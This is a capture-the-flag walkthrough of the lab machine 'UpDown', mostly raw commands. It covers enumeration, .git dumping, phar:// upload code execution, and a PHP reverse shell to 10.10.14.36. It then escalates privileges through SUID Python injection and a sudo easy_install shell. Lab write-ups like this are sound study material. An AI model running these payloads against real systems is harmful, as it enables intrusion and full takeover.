g3rm
Summary
Target - 10.129.227.227
Nmap
nmap -sC -sV -Pn -p- 10.129.227.227 -o UpDown_AllPort
WEB
# 호스트 등록
echo "10.129.227.227 siteisup.htb" | sudo tee -a /etc/hosts
# 디렉토리 탐색
gobuster dir -u siteisup.htb -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://siteisup.htb/dev -w /usr/share/wordlists/dirb/common.txt
# 서브도메인 탐색
gobuster vhost -u http://siteisup.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
# 서브도메인 호스트 등록
echo "10.129.227.227 dev.siteisup.htb" | sudo tee -a /etc/hosts
# git dump
git-dumper http://siteisup.htb/dev/.git dev
# config 보기
cat .htaccess
phar:// Exploit
# 파일 필터링 로직 및 upload 경로 확인
cat checker.php
echo "<?php phpinfo(); ?>" > info.php
zip info.zip info.php
mv info.zip info.txt
http://dev.siteisup.htb/?page=phar://uploads/a4cb7397e7c127125e4af8261d1c8fef/info.txt/info
dfunc-bypasser.py
# vi dfunc-bypasser.py 수정
phpinfo = requests.get(url, headers={"Special-dev":"only4dev"}).text
# 실행
python dfunc-bypasser.py --url http://dev.siteisup.htb/?page=phar://uploads/11d0d701df649f7c93b673db37e5c66b/info.txt/info
proc_open Exploit
# poc.php
<?php
$descriptorspec = array(
0 => array('pipe', 'r'), // stdin
1 => array('pipe', 'w'), // stdout
2 => array('pipe', 'a') // stderr
);
$cmd = "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.36/9999 0>&1'";
$process = proc_open($cmd, $descriptorspec, $pipes, null, null);
?>
zip poc.zip poc.php
mv poc.zip poc.txt
http://dev.siteisup.htb/?page=phar://uploads/3a6182d84b5c185244868a879af73f68/poc.txt/poc
Privilege Escalator [developer]
# find suid
find / -user developer -perm -4000 -exec ls -ldb {} \; 2>/dev/null
# suid abuse
cat siteisup_test.py
./siteisup
__import__('os').system('/bin/bash')
# ssh abuse for a more persistent foothold
ls -al /home/developer/.ssh
chmod 600 id_rsa
ssh -i id_rsa developer@siteisup.htb
Privilege Escalator [root]
# sudo abuse
sudo -l
# gtfo easy_install
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo easy_install $TF
End
